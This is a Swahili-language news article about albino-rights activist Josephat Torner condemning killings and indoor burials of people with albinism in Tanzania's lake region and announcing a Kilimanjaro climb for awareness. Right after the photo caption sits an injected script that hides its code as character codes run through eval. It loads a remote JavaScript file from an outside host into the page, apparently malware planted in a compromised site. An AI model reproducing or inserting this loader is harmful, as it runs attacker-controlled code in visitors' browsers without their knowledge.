Recent Comments

Wenye ualbino waomba kulindwa na kuacha kuzikwa ndani

<p>Mwanaharakati wa kutetea haki za wenye ualbino nchini Tanzania Bw. Josephat Torner.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Na Steven Samwel – Mwanza

Hatua za haraka zimetakiwa kuchukuliwa dhidi ya wanaowauwa na kuwazika ndani watu wenye ualbino kwa kuwa kitendo hicho kinakiuka maazimio ya haki za binadamu yaliyopitishwa na umoja wa mataifa Disember 10 mwaka 1948.

Kutokana na hali hiyo, vyombo vya dola vimetakiwa kukabiliana na uhalifu huo ili kuiweka jamii katika hali ya usalama kulingana na maazimio ya Umoja wa nchi za Afrika AU kifungu cha 5, kinachosema mtu yeyote asiteswe, asiadhibiwe, kudharauliwa, kutendewa unyama au ukatili

Akizungumza na waandishi wa habari jijini Mwanza mwanaharakati wa kutetea haki za wenye ualbino nchini Josephat Torner, kupitia Josephat Torner Foundation Europe (JTFE) anapinga udhalimu huo.

Ameongeza kuwa licha ya kuwepo usalama kwa watu wenye ualbino nchini, viashiria vya ukiukaji wa maazimio ya umoja huo bado vinaendelea kanda ya ziwa kwa kuwazikia ndani watu wenye ualbino, kwa kuwang’oa kucha pamoja na nywele.

Hali hiyo imepelekea taasisi hiyo ya Josephat Tonner kupambana na mila potofu kwa kupanda mlima Kilimanjaro ili kuokoa kizazi cha watu wenye ualbino lililopewa kaulimbiu ya kuvunja ukimya katika kilele cha Africa hapa balozi wa watu wenye ualbino anaeleza dhumuni la kupanda mlima Kilimanjaro.

Nchi zitakazoshiriki katika tukio hilo la kupanda mlima Kilimanjaro, ambao ni mrefu kuliko yote barani Afrika zitatoka bara la Ulaya na Afrika, ili kuonesha mshikamano katika kupinga udhalimu huo.